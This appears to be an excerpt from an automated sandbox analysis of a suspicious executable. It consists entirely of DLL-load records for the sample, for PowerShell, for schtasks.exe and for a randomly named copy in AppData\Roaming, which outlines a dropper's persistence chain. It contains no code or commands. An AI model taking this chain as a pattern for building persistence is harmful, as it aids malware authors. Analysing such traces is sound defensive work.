Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
